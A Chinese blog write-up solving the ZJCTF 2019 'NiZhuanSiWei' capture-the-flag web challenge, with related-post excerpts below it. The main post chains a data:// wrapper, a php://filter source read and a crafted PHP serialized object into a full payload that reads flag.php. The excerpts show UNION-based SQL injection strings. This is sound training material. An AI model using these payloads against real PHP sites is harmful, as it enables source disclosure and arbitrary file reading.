NiZhuanSiWei

最新推荐文章于 2023-12-20 18:46:30 发布
最新推荐文章于 2023-12-20 18:46:30 发布
阅读量2.2k 收藏
点赞数
分类专栏: 网安学习 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LL123412138/article/details/120982373
版权

个人做题感受

题解

1、php伪协议

也是刚开始学,这里参考这位大佬

2、php反序列化

3、过程

3.1 text

查看关于text,需要text内容存在,且text文件中的数据为welcome to the zjctf
用到了php伪协议中的data。
我们可以构造这样的

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

这里后面的base64编码的内容就是要求的welcome to the zjctf,具体data使用方法可以查找目录中给出的大佬博客。

3.2 file

对于file有
在这里插入图片描述
也就是说file不能包含flag,且提示了userless.php。则采用file://,构造

&file=php://filter/read=convert.base64-encode/resource=useless.php

拿到一长串数字。估计是base64编码,解码拿到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

3.3 password

对于password会采用反序列化,对于__tostring会在输出的时候调用。所以,我们需要在password输入flag的序列化结果,在程序反序列化之后,输出时自动调用__tostring魔法函数,从而输出文件内容。
我们可以直接在上面base64解码后程序中直接用serialize()函数对flag类进行序列化。
程序如下

class Flag{  //flag.php  
    public $file='flag.php';  //根据提示修改file的值
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
echo serialize(new Flag());
?>

构造

&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

如果不一样,可以看一下是否把file设置值为’flag.php’
进入这样的一个页面
在这里插入图片描述
查看源代码可以拿到flag
在这里插入图片描述
完整的payload

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
LL123412138
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 350
这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。
2019NiZhuanSiWei
4pri1
03-15 108
考点:php伪协议、 2019]NiZhuanSiWei 考点:php伪协议、 打开后是源码,拖到vscode里审计 第一个绕过点: if(isset(text,‘r’)===“welcome to the zjctf”)) 可以用data://写入协议 所以第一个payload: ?text=data://text/plain,welcome to the zjctf 接着审计,第二个绕过的地方是,这里会正则匹配flag if(preg_match("/fla.
[ZJCTF 2019]NiZhuanSiWei1 详解
qq_63548648的博客
12-03 1751
1
[ZJCTF 2019]NiZhuanSiWei
Sk1y的博客
02-07 4080
[ZJCTF 2019]NiZhuanSiWei 目录 [ZJCTF 2019]NiZhuanSiWei 题目:buu上的web题目,链接 解题过程: 第一层绕过: 第二层绕过: 第三层绕过: 最终的payload: 相关链接: 题目:buu上的web题目,链接 题目:这个题目跟文件包含漏洞关联很大,通过这个题目,再巩固一下文件包含漏洞。 解题过程: 打开题目后,代码审计 <?php $text = $_GET["text"]; $file = $_GET...
[ZJCTF 2019]NiZhuanSiWei 1
qq_43618536的博客
07-03 322
BUUCTF的[ZJCTF 2019]NiZhuanSiWei 1
[ZJCTF 2019]NiZhuanSiWei1
最新发布
m0_73612768的博客
12-20 520
PHP伪协议的使用
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1097
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 964
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
BUUCTF [ZJCTF 2019]NiZhuanSiWei
m0_49025459的博客
05-02 548
进去就是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>&l
burp suit安装和证书安装
LL123412138的博客
05-17 1812
burp suit 安装和证书安装 这里仅仅只是我个人安装的过程,可以提供参考,在下也是小白,都还没有入门,如果有错误可以指出。 安装 安装推荐参考这个博文[Burp Suite安装配置详解(附Java 环境安装)](https://blog.csdn.net/qq_26605049/article/details/89574477) 证书安装 这个比较麻烦。用Microsoft Edge浏览器为例。 先安装浏览器插件 1、 2、 3、这里如果自己有下载插件安装文件可以点击加载解压缩文件,选择自己
数据格式介绍和几种加密方式介绍
LL123412138的博客
05-18 644
CTF密码学常见加密解密总结 Base64 特点:只由a-z A-Z + / 组成 一篇文章彻底弄懂Base64编码原理 url编码 特点:%16进制码组成 asic码转16进制,前面加% RSA 特点:字母数字,用+串联,结尾有=号 公私钥加密 ...
buu-misc刷题
LL123412138的博客
08-06 593
二维码 扫描二维码,没有结果,将二维码改成txt,可以看到一个 可能包含一个文件 将后缀改成zip,用解压软件查看,果然有,要密码,几经查找,找到一个ziperello软件,这里推荐一个包含ziperello下载地址博客,博客文末有,我不敢直接贴地址,自己去找吧。解压直接能用,暴力破解,打开后拿到flag{vjpw_wnoei} N种方法解决 下载解压后,更改格式为txt,打开是一个这样的东西, 有base64,找一个能解码base64的软件http://www.jsons.cn/img2base64/
BuyFlag
LL123412138的博客
10-13 408
BuyFlag 文章目录BuyFlag一些废话过程1、下载安装maxhackbar2、添加代理3、解题 一些废话 哎呀妈呀,费了我老大劲了。菜鸡的我看了大佬的wp,觉得我行了。但。。但。。但是那个GET改成POST之后,一直没反应。网上各个大佬的回答大多是简单的,但都是简单一个用hackbar改一下。hackbar收费了,咱也不是那种有钱人,只能找找其他的,有一个maxhackbar替代品,但是网上教程不是很详细,不太会,阿巴阿巴阿巴。最终找出一个替代的解决方案。那就是:使用maxhackbar将请求从GE
Easy MD5
LL123412138的博客
10-25 323
仅仅是个人刷题记录,有问题欢迎友好讨论 1、数组绕过 md5()在php中无法处理数组,会将数组转化为null 2、特定的md5加密语句 ffifdyop\276f722736c95d99e921722cf9ed621通过md5加密后的数字串会被sql用ascii解释变成包含’ ’ or ’ '的语句 3、解题过程 页面有一个输入什么都没有反馈的输入框,通过网络响应头可以看到有一个hint 也就是说password会经过这样的一个md5()函数,再赋值给password。我们可以通过特殊字符组合通过md5
web刷题
LL123412138的博客
08-11 140
WarmUp 查看源文件,提示了source.php,那我们就去看看source.php有什么东西。 /source.php 一堆代码,我们慢慢看,很明显,有一个emm的类,类里面有一个checkFile函数,需要传入一个参数page,并返回布尔值。接下来简单了解一些基本函数。 isset:判断是否为空 in_array:判断是否在数组中 mb_substr:获取字符串的指定字段 mb_strpos:获取指定字符出现在字符串的位置 is_string:判断是否全为字符 来,我们再来看看这段程序。 程序获
csrf漏洞学习
LL123412138的博客
05-23 133
通过js向网页发送请求获取内容 //javascrip实现 var xml = new XMLHttpRequest(); xml.open('GET', "网址"); //xml.setRequestHeader("自定义报文头"); xml.send('sss'); //利用回调函数获取返回页面的值。 xml.onreadystatechange = function() { //判断是否获取成功。成功则弹出值。 if (this.status == 200) {
sqli-labs
LL123412138的博客
07-30 102
sqli-labs1 学到了一个函数group_concat 检查闭合:存在注入点 ?id=0' 检查输出:2,3输出 ?id=0'+union+1,2,3+--+ 检查数据库:security ?id=0'+union+select+1,2,database()+--+ 检查表:emails,referers,uagents,users(好多呀,也不知道有没有,一个一个看看吧) ?id=0'+union+select+1,2,group_concat(table_name)+from+informa
php初步接触学习
LL123412138的博客
05-23 84
只是简单了解,很多都可以有另外的实现方式 菜鸟教程 标签 <?php //内容 ?> 输出语句 //写在标签内。 //echo 内容; 变量 php中对于变量的使用都要在前面加上‘$’用于识别变量。 //$变量名=变量值; //变量值可以是任意常见的数据类型。 $a=1; $str='I\'m a str'; $array=[1,2,3,4]; //关于字符串拼接,用。 $st=$st1.$str2; 函数 类似js //function 函数名(){} funtion add($a,$
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值